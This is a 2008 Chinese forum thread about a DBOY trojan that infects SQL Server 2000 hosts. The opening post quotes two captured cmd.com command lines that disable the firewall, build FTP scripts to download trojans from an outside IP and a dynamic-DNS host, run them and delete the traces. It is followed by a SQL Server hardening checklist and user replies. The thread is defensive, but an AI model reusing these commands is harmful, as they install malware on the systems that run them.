使用SQL 2000+SP4中病毒的要注意了！！！绝对要看(已找到相对有效方法!

dakates · 发表于 2008-12-18 20:37:30

这几天装了SQL 2000+SP4补丁后，在任务管理器里面出现了CMD.COM木马病毒。
昨天到今天连续从做6次系统，装了SQL 2000+SP4补丁后，情况都一样。
结果一查之下，才发现CMD.COM病毒原来很猛啊！
经过2天的实验,病毒终于没有爆发.
办法就是强化所有SQL密码,数字,符号+字母,不要在用123456了!
另外,把杀毒软件弄上~~~

具体情况如下（转帖）：
运行症状：系统运行一段时间后，系统会变得很慢，运用Process Explorer查看，发现是SQLmanagr.exe进程下面挂了很多CMD.COM进程,此程序疯狂的从网络下载dboy病毒，如果不及时的清除，还会下载更加厉害的http文件下载器，系统最终会完全崩溃！详细的病毒发作程序根据不同的病毒扫描者不同，比如：不定期在C:\WINDOWS\system32\Jay\路径下生成随机EXE文件。自动创建 C:\WINDOWS\system32\dboy1.sys；C:\WINDOWS\system32\cmd.com.等文件。怀疑中了DBOY系列后门木马，通过进程创建父PID可看出，病毒进程与SQLSERVR进程相关联不定期在C:\WINDOWS\system32\Jay\路径下生成随机EXE文件。自动创建 C:\WINDOWS\system32\dboy1.sys；C:\WINDOWS\system32\cmd.com.等文件。而这些文件都是DBOY系列后门木马，通过进程创建父PID可看出，病毒进程与SQLSERVR进程相关联。

在附带一个很强大的分析（同样转载）：
每次中毒的现像都是sqlserver.exe进程去执行cmd.com进程然后生成*.sys与*.bat两个文件然后去使用ftp.exe去下载木马下载器然后杀毒软件开始报警了.

下面是cmd.com执行指令内容
"C:"WINDOWS"system32"cmd.com" /c net1 stop sharedaccess&echo open 218.61.11.97>dboy.sys&echo 11>>dboy.sys&echo 11>>dboy.sys&echo get pc.exe C:"boots.exe>>dboy.sys&echo bye>>dboy.sys&echo ftp -s:dboy.sys>dboy.bat&echo copy C:"boots.exeC:"WINDOWS"system32"inf"test.exe&echo start start /high "" C:"WINDOWS"system32"inf"test.exe&echo start C:"boots.exe>>dboy.bat&echo start C:"boots.exe>>dboy.bat&echo del dboy.sys>>dboy.bat&echo del %0>>dboy.bat&dboy.bat

"C:"WINDOWS"system32"cmd.com" /c sc stop sharedaccess&echo open ddosboy1.3322.org >dboy1.sys&echo dboy>>dboy1.sys&echo if>>dboy1.sys&echo get dboy1.exe C:"Windows"tcpsrv1.exe>>dboy1.sys&echo bye>>dboy1.sys&echo ftp -s:dboy1.sys>system1.bat&echo start C:"Windows"tcpsrv1.exe>>system1.bat&echo start C:"Windows"tcpsrv1.exe>>system1.bat&echo del dboy1.sys>>system1.bat&echo del %0>>system1.bat&system1.bat

第一次中毒之后就对sql server进行了加强删除了"xp_cmdshell"这个sql server中最不安全的扩展存储过程.不过好了没一个月又来中一次.
这一次我检查了数据库日志xp_cmdshell并没有恢复不过却在日志在发现了sp_oacreate与sp_oamethod两个存储过程的执行日志.

防御SQL注入的一些要点与方法
1. 确认已经安装了windows操作系统和SQL Server的最新补丁程序。
2. 评估并且选择一个考虑到最大的安全性但是同时又不影响功能的网络协议。多协议是明智的选择但是它有时不能在异种的环境中使用。
说明：如果可能请除去不需要的网络协议。
3. 给 "sa" 和具有"sysadmin"权限的帐户设定强壮的密码来加强其安全性。至于什么是强壮的密码呢，个人认为是字母、数字、特殊字符的组合，不少八位字符。
4. 使用一个低特权用户作为 SQL 服务器服务的查询操作账户，不要用 LocalSystem 或sa。
这个低权限的帐户应该只有最小的权限和限制这个帐户对SQL Server的查询与存取操作。用户可以用最小权限查询sql server中的很多东西。若非必须不要给予多余的权限。
注意：当使用企业管理器做以上设置时文件，注册表和使用者权利上的权限处理。
5. 确定所有的SQL服务器数据，而且系统文件是装置在 NTFS 分区，且"目录访问控制"被应用。
如果万一某人得到对系统的存取操作权限该层权限可以阻止入侵者破坏数据，避免造成一场大灾难。
6.如果你不需要 xp_cmdshell 那请停用它。如果需要的话再把它增加回来。
其实这也好也不好 ————一个侵入者如果发现它不在了，也只需要把他加回来。考虑一下，可以除去在下面的 dll但是移除之前必须测试因为有些dll同时被一些程序所用。
要找到其他的程序是否使用相同的 dll请进行以下步骤:
首先得到该 dll：
select o.namec.text from dbo.syscomments c dbo.sysobjects o where c.id=o.id and o.name=‘xp_cmdshell‘
其次使用相同的 dll发现其他的扩展储存操作是否使用该dll：
select o.namec.text from dbo.syscomments c dbo.sysobjects o where c.id=o.id and c.text=‘xplog70.dll‘
用户可以用同样的办法处理下面步骤中其他你想去掉的进程。
7. 如不需要就停用对象连接与嵌入自动化储存程序 ( 警告 - 当这些储存程序被停用的时候一些企业管理器功能可能丢失). 这些存储过程如下:
sp_OACreate
sp_OADestroy
sp_OAGetErrorInfo
sp_OAGetProperty
sp_OAMethod
sp_OASetProperty
sp_OAStop
如果你决定停用这些存储过程，那么请给他们写一个脚本这样在以后你用到他们的时候你能够把他们重新添加回来。

8. 禁用你不需要的注册表存储过程。(同上面的警告)这些包括:
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumvalues
xp_regremovemultistring
注意 :xp_regread/ xp_regwrite这两个存储过程的移除影响一些主要功能包括日志和SP的安装，所以他们的移除不被推荐。
9.移除其他你认为会造成威胁的系统储存过程。这种存储过程是相当多的，而且他们也会浪费一些cpu时间。
小心不要首先在一个配置好的服务器上这样做。首先在开发的机器上测试，确认这样不会影响到任何的系统功能。在下面是我们所推荐的有待你评估的一些列表:
sp_sdidebug
xp_availablemedia
xp_cmdshell
xp_deletemail
xp_dirtree
xp_dropwebtask
xp_dsninfo
xp_enumdsn
xp_enumerrorlogs
xp_enumgroups
xp_enumqueuedtasks
xp_eventlog
xp_findnextmsg
xp_fixeddrives
xp_getfiledetails
xp_getnetname
xp_grantlogin
xp_logevent
xp_loginconfig
xp_logininfo
xp_makewebtask
xp_msver xp_perfend
xp_perfmonitor
xp_perfsample
xp_perfstart
xp_readerrorlog
xp_readmail
xp_revokelogin
xp_runwebtask
xp_schedulersignal
xp_sendmail
xp_servicecontrol
xp_snmp_getstate
xp_snmp_raisetrap
xp_sprintf
xp_sqlinventory
xp_sqlregister
xp_sqltrace
xp_sscanf
xp_startmail
xp_stopmail
xp_subdirs
xp_unc_to_drive
xp_dirtree

10. 除去数据库的guest账户，这样可以把未经许可的使用者排除在外。例外情况是master和 tempdb 数据库因为对他们guest帐户是必需的。
11. 若非必须，请完全地禁用SQL邮件功能。它的存在使潜在的攻击者递送潜在的 trojans ，病毒或是简单实现一个DOS攻击成为可能
12. 记录所有的用户存取访问情况。从企业管理器做这些设定或通过以sa登陆进入查询分析器的下列各项:
xp_instance_regwrite N‘HKEY_LOCAL_MACHINE‘ N‘SOFTWARE" Microsoft"MSSQLServer"MSSQLServer‘N‘AuditLevel‘REG_DWORD3
13. 建立一个计划的任务运行:
然后再重定向输出到一个文本文件或电子邮件，因此你监测失败的登录尝试。
这也为系统管理员提供一个好的记录攻击的方法。也有很多用来分析NT日志事件的第三者工具。
注意: 你可能需要将路径换成你安装SQL的路径。
14. 设定非法访问和登陆失败日志警报。到企业管理器中的"Manager SQL Server Messages "搜寻任何有关无权访问的消息
( 从查找"login failed"和"denied"开始). 确定你所有感兴趣的信息被记录到事件日志。然后在这些信息上设定警报发送一个电子邮件或信息到一个能够对问题及时响应的操作员。
15. 经常检查组或角色全体会员并且确定用组分配权限，这样你的审计工作能够简化。确定当你在的时候公众的组不能从系统表执行选择操作。
16. 花些时间审计用空密码登陆的请求。使用下面的代码进行空密码检查:
select
password *
from syslogins
where password is null
order by name
17. 检查所有非sa用户的存取进程和扩充存储进程的权限。使用下面的查询定期的查询哪一个进程有公众存储权限:
Use master
select sysobjects.name
from sysobjectssysprotects
where sysprotects.uid=0
AND xtype 在 (‘X‘‘P‘)
AND sysobjects.id=sysprotects.id
Order by name

18. 当时用企业管理器的时候，使用整合的安全策略。过去，企业管理器被发现在标准的安全模态中储存 "sa" 密码在注册表的 plaintext 中。注意: 即使你改变模态密码也会留在注册表中。

sql 2000:

使用 regedit 而且检查键:
HKEY_USERS"{yourSID}"software"Microsoft"Microsoft SQL server"80"tool"SQLEW"registered server X"SQL server group
("SQL server组" 是默认值但是你可能已建立用户组因此相应地改变其位置)

sql 2005已经没有在注册表中写sqlew这个键了.

19. 制定一个安全审核计划，每月的一份安全报告，对IT主管可用的报表包括新的开发内容中进行的数据库修改，成功的攻击备份保护和对象存取失败统计。

20. 不要允许使用者交互式登陆到 SQL Server之上。这个规则适用任何的服务器。一旦一个使用者能够交互式进入一个服务器之内就有能用来获得管理员的存取特权得到管理员权限。

原帖地址：http://www.aqdown.com/it_group_thread/view/id-4286

http://hi.baidu.com/isfz/blog/item/aa71c68080076bd09123d932.html

[ 本帖最后由 dakates 于 2008-12-20 22:12 编辑 ]

dakates · 发表于 2008-12-18 20:39:52

沙发自己的，希望强人解决该问题～

半个香橙 · 发表于 2008-12-18 20:44:08

哇!!!真恐怖~~~谢谢LZ~~

dakates · 发表于 2008-12-18 20:51:00

原帖由 半个香橙 于 2008-12-18 20:44 发表
哇!!!真恐怖~~~谢谢LZ~~

一起呼唤高人解决这个问题吧～这问题目前简直就是网游单机的AIDS啊

llp348 · 发表于 2008-12-18 20:51:30

病毒真的很可怕很讨厌无处不在

107391971 · 发表于 2008-12-18 21:13:03

我就是用SQL2000+SP4和楼主说的一模一样~支持楼主整在想办法解决

feelword · 发表于 2008-12-18 23:02:10

LZ，你写的太多了，来点图片就好了

fei0315003x · 发表于 2008-12-18 23:50:17

原帖由 dakates 于 2008-12-18 20:51 发表

一起呼唤高人解决这个问题吧～这问题目前简直就是网游单机的AIDS啊

支持

BBQ1981 · 发表于 2008-12-19 00:59:32

用精简版SQL2000有没有这个问题？？~~不过我用了好久好像没出现过CMD.COM的进程。。。希望真的没问题啦

monkey100 · 发表于 2008-12-19 10:18:49

为此重装系统两遍，目前未再发生，应该是各种SF服务端后门引起的。目前不敢架单机了

swellen · 发表于 2008-12-19 11:55:57

没碰到这个问题~~

lovefmm · 发表于 2008-12-19 12:10:56

我的有卡巴不停的发现木马病毒还有微点也发现了怎么弄啊 ???

绝地苍狼 · 发表于 2008-12-19 15:26:21

偶就是这样！刚才重装的系统！痛苦啊！丫的

不断的向偶的系统里面下载木马病毒！

czpxh · 发表于 2008-12-19 15:40:00

这么恐怖？？？？学习了！

dakates · 发表于 2008-12-20 22:07:12

原帖由 feelword 于 2008-12-18 23:02 发表
LZ，你写的太多了，来点图片就好了

这个还要图片么?

alicetear · 发表于 2008-12-20 22:11:03

好深奥

看不懂，来点图片

duke123 · 发表于 2008-12-21 08:48:30

很危险呀

支持楼主

wowuedead · 发表于 2008-12-21 09:07:13

你们真的很搞笑，这是SQL2000的漏洞，打不打SP4都有
解决方法就是把1433这个端口的远程给禁用，这样就不会成为肉鸡了
其它方法都是吹屎，一点屁用没有
用自己的防火墙或者在IP安全策略里禁下1433就行了

jdcb · 发表于 2008-12-21 09:15:06

多谢分享啊··还好我还没有开始装你说的东西···

qz1314520 · 发表于 2008-12-21 09:55:15

没发现这个问题,谢谢提醒...

		自动登录	找回密码
密码			注册

[注意] 使用SQL 2000+SP4中病毒的要注意了！！！绝对要看(已找到相对有效方法!